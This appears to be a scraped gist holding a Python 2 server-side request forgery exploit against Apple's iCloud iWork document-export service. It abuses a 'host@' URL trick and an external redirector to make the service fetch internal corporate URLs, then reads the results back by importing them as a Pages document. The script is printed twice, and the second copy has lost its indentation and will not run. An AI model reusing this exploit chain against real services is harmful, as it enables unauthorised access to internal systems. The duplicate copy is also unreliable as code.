samwcyo/ssrf Secret

## ssrf
import requests, json

cookies = ''
clientId = ""
dsId = ""

def firstStep(url):
    realUrl = "xss.buer.haus/redir.php?url={}".format(url)
    r = requests.post("https://p37-iworkexportws.icloud.com/iw/export-ws/10000033657/store_document?build=primary&clientId={}&dsid={}".format(clientId, dsId), data = {
        "url": "https://p37-mailws.icloud.com:443@{}".format(realUrl),
        "source": "webmail",
        "build": "primary"
    }, headers = {
        "Content-Type": "application/x-www-form-urlencoded; charset=utf-8",
        "Origin": "https://www.icloud.com",
        "Cookie": cookies
    })
    # print r.headers
    return json.loads(r.text)["job_id"]

def secondStep():
    r = requests.get("https://p37-docws.icloud.com/ws/com.apple.Pages/list/lookup_by_id?clientId={}&document_id=documents&dsid={}".format(clientId, dsId), data = {}, headers = {
        "Origin": "https://www.icloud.com",
        "Cookie": cookies
    })
    # print "Second: {}".format(r.text)

def thirdStep():
    r = requests.get("https://p37-docws.icloud.com/ws/com.apple.Pages/list/list?clientId={}&concise=true&document_id=documents&dsid={}&fetch_manifests=false&skipErrors=true".format(clientId, dsId), data = {}, headers = {
        "Origin": "https://www.icloud.com",
        "Cookie": cookies
    })
    # print "Three: {}".format(r.text.encode("utf8"))

def fourthStep(jobId):
    r = requests.post("https://p37-iworkexportws.icloud.com/iw/export-ws/{}/store_document_status?build=primary&clientId={}&dsid={}&job_id={}".format(dsId, clientId, dsId, jobId), data = {}, headers = {
        "Origin": "https://www.icloud.com",
        "Cookie": cookies
    })
    # print "Four: {}".format(r.text)

def fifthStep(jobId):
    r = requests.post("https://p37-iworkexportws.icloud.com/iw/export-ws/{}/move_stored_document?build=primary&clientId={}&dsid={}".format(dsId, clientId, dsId), data = {
        "job_id": jobId,
        "name": "text_0%202.txt",
        "zone": "com.apple.Pages",
        "parent_id": "documents",
        "package": "N",
        "source": "webmail",
        "build":"primary"
    }, headers = {
        "Content-Type": "application/x-www-form-urlencoded; charset=utf-8",
        "Origin": "https://www.icloud.com",
        "Cookie": cookies
    })
    # print "Five: {}".format(r.text)

def sixthStep(jobId):
    r = requests.post("https://p37-iworkexportws.icloud.com/iw/export-ws/{}/store_document_status?build=primary&clientId={}&dsid={}&job_id={}".format(dsId, clientId, dsId, jobId), data = {}, headers = {
        "Content-Type": "text/plain",
        "Origin": "https://www.icloud.com",
        "Cookie": cookies
    })
    # print "Six: {}".format(r.text)
    return r.text

def seventhStep(pageId):
    r = requests.post("https://p37-iwmb.icloud.com/iwmb/pages/import?s=5816&clientId={}&version=1010&clientType=G10.1&clientBuildNumber=10B146".format(clientId), json = {
        "document_id": "docws:{}:com.apple.Pages:{}".format(dsId, pageId),
        "language":"en-us",
        "locale":"en-us",
        "timezone":"US/Pacific"
    }, headers = {
        "Content-Type": "text/plain; charset=utf-8",
        "Origin": "https://www.icloud.com",
        "Cookie": cookies
    })
    # print "Seven: {}".format(r.text)
    return json.loads(r.text)

def eigthPage(data, pageId):
    r = requests.post("https://p37-iwmb.icloud.com/iwmb/pages/create?s=5816&clientId={}&version=1010&clientType=G10.1&clientBuildNumber=10B146".format(clientId), json = {
        "parent_item_id":"documents",
        "name":"text_0 2.pages",
        "bootstrap_source_id": data["bootstrap_source_id"],
        "bootstrap_source_token": data["bootstrap_source_token"],
        "delete_import_source_auth_token":"null",
        "import_source_document_id":"docws:{}:com.apple.Pages:{}".format(dsId, pageId),
        "is_import": True,
        "is_open_copy": False,
        "language":"en-us",
        "locale":"en-us",
        "timezone":"US/Pacific",
        "zone":"com.apple.Pages"
    }, headers = {
        "Content-Type": "text/plain; charset=utf-8",
        "Origin": "https://www.icloud.com",
        "Cookie": cookies
    })
    # print "Eight: {}".format(r.text)
    return json.loads(r.text)

def ninthPage(data):
    r = requests.get("https://iwmb.icloud.com/iwmb/pages/n{}/manifest?version=1010&clientType=G10.1&clientBuildNumber=10B146".format(data["item_id"]), headers = {
        "Origin": "https://www.icloud.com",
        "Cookie": cookies
    })
    # print "Nine: {}".format(r.text)
    return json.loads(r.text)

def finalPage(data):
    r = requests.get("https://p37-iwres.icloud.com/iwmb/{}fetchDocument?s=5816&version=1010&clientType=G10.1&clientBuildNumber=10B146".format(data["webservices"]["documentPath"]), headers = {
        "Origin": "https://www.icloud.com",
        "Cookie": cookies
    })
    return r.text

def find_between( s, first, last ):
    try:
        start = s.index( first ) + len( first )
        end = s.index( last, start )
        return s[start:end]
    except ValueError:
        return ""

def fetchURL(url):
    jobId = firstStep(url)
    secondStep()
    thirdStep()
    fourthStep(jobId)
    fifthStep(jobId)
    while True:
        data = sixthStep(jobId)
        if "uploading" in data:
            continue
        pageId = json.loads(data)["result"]["document_id"]
        break
    data = seventhStep(pageId)
    data = eigthPage(data, pageId)
    data = ninthPage(data)
    out = finalPage(data).encode("utf8")
    return out

def clean(content):
    content = content.replace("\\n", "\n")
    return find_between(content, '<html>', '</html>')

# url = "http://redacted.corp.apple.com:1234/nexus/redacted"
# url = "http://redacted.corp.apple.com:1234/nexus/redacted"
url = "http://redacted.corp.apple.com:1234/nexus/redacted"

print clean(fetchURL(url))
	import requests, json

	cookies = ''
	clientId = ""
	dsId = ""

	def firstStep(url):
	realUrl = "xss.buer.haus/redir.php?url={}".format(url)
	r = requests.post("https://p37-iworkexportws.icloud.com/iw/export-ws/10000033657/store_document?build=primary&clientId={}&dsid={}".format(clientId, dsId), data = {
	"url": "https://p37-mailws.icloud.com:443@{}".format(realUrl),
	"source": "webmail",
	"build": "primary"
	}, headers = {
	"Content-Type": "application/x-www-form-urlencoded; charset=utf-8",
	"Origin": "https://www.icloud.com",
	"Cookie": cookies
	})
	# print r.headers
	return json.loads(r.text)["job_id"]

	def secondStep():
	r = requests.get("https://p37-docws.icloud.com/ws/com.apple.Pages/list/lookup_by_id?clientId={}&document_id=documents&dsid={}".format(clientId, dsId), data = {}, headers = {
	"Origin": "https://www.icloud.com",
	"Cookie": cookies
	})
	# print "Second: {}".format(r.text)

	def thirdStep():
	r = requests.get("https://p37-docws.icloud.com/ws/com.apple.Pages/list/list?clientId={}&concise=true&document_id=documents&dsid={}&fetch_manifests=false&skipErrors=true".format(clientId, dsId), data = {}, headers = {
	"Origin": "https://www.icloud.com",
	"Cookie": cookies
	})
	# print "Three: {}".format(r.text.encode("utf8"))

	def fourthStep(jobId):
	r = requests.post("https://p37-iworkexportws.icloud.com/iw/export-ws/{}/store_document_status?build=primary&clientId={}&dsid={}&job_id={}".format(dsId, clientId, dsId, jobId), data = {}, headers = {
	"Origin": "https://www.icloud.com",
	"Cookie": cookies
	})
	# print "Four: {}".format(r.text)

	def fifthStep(jobId):
	r = requests.post("https://p37-iworkexportws.icloud.com/iw/export-ws/{}/move_stored_document?build=primary&clientId={}&dsid={}".format(dsId, clientId, dsId), data = {
	"job_id": jobId,
	"name": "text_0%202.txt",
	"zone": "com.apple.Pages",
	"parent_id": "documents",
	"package": "N",
	"source": "webmail",
	"build":"primary"
	}, headers = {
	"Content-Type": "application/x-www-form-urlencoded; charset=utf-8",
	"Origin": "https://www.icloud.com",
	"Cookie": cookies
	})
	# print "Five: {}".format(r.text)

	def sixthStep(jobId):
	r = requests.post("https://p37-iworkexportws.icloud.com/iw/export-ws/{}/store_document_status?build=primary&clientId={}&dsid={}&job_id={}".format(dsId, clientId, dsId, jobId), data = {}, headers = {
	"Content-Type": "text/plain",
	"Origin": "https://www.icloud.com",
	"Cookie": cookies
	})
	# print "Six: {}".format(r.text)
	return r.text

	def seventhStep(pageId):
	r = requests.post("https://p37-iwmb.icloud.com/iwmb/pages/import?s=5816&clientId={}&version=1010&clientType=G10.1&clientBuildNumber=10B146".format(clientId), json = {
	"document_id": "docws:{}:com.apple.Pages:{}".format(dsId, pageId),
	"language":"en-us",
	"locale":"en-us",
	"timezone":"US/Pacific"
	}, headers = {
	"Content-Type": "text/plain; charset=utf-8",
	"Origin": "https://www.icloud.com",
	"Cookie": cookies
	})
	# print "Seven: {}".format(r.text)
	return json.loads(r.text)

	def eigthPage(data, pageId):
	r = requests.post("https://p37-iwmb.icloud.com/iwmb/pages/create?s=5816&clientId={}&version=1010&clientType=G10.1&clientBuildNumber=10B146".format(clientId), json = {
	"parent_item_id":"documents",
	"name":"text_0 2.pages",
	"bootstrap_source_id": data["bootstrap_source_id"],
	"bootstrap_source_token": data["bootstrap_source_token"],
	"delete_import_source_auth_token":"null",
	"import_source_document_id":"docws:{}:com.apple.Pages:{}".format(dsId, pageId),
	"is_import": True,
	"is_open_copy": False,
	"language":"en-us",
	"locale":"en-us",
	"timezone":"US/Pacific",
	"zone":"com.apple.Pages"
	}, headers = {
	"Content-Type": "text/plain; charset=utf-8",
	"Origin": "https://www.icloud.com",
	"Cookie": cookies
	})
	# print "Eight: {}".format(r.text)
	return json.loads(r.text)

	def ninthPage(data):
	r = requests.get("https://iwmb.icloud.com/iwmb/pages/n{}/manifest?version=1010&clientType=G10.1&clientBuildNumber=10B146".format(data["item_id"]), headers = {
	"Origin": "https://www.icloud.com",
	"Cookie": cookies
	})
	# print "Nine: {}".format(r.text)
	return json.loads(r.text)

	def finalPage(data):
	r = requests.get("https://p37-iwres.icloud.com/iwmb/{}fetchDocument?s=5816&version=1010&clientType=G10.1&clientBuildNumber=10B146".format(data["webservices"]["documentPath"]), headers = {
	"Origin": "https://www.icloud.com",
	"Cookie": cookies
	})
	return r.text

	def find_between( s, first, last ):
	try:
	start = s.index( first ) + len( first )
	end = s.index( last, start )
	return s[start:end]
	except ValueError:
	return ""

	def fetchURL(url):
	jobId = firstStep(url)
	secondStep()
	thirdStep()
	fourthStep(jobId)
	fifthStep(jobId)
	while True:
	data = sixthStep(jobId)
	if "uploading" in data:
	continue
	pageId = json.loads(data)["result"]["document_id"]
	break
	data = seventhStep(pageId)
	data = eigthPage(data, pageId)
	data = ninthPage(data)
	out = finalPage(data).encode("utf8")
	return out

	def clean(content):
	content = content.replace("\\n", "\n")
	return find_between(content, '<html>', '</html>')

	# url = "http://redacted.corp.apple.com:1234/nexus/redacted"
	# url = "http://redacted.corp.apple.com:1234/nexus/redacted"
	url = "http://redacted.corp.apple.com:1234/nexus/redacted"

	print clean(fetchURL(url))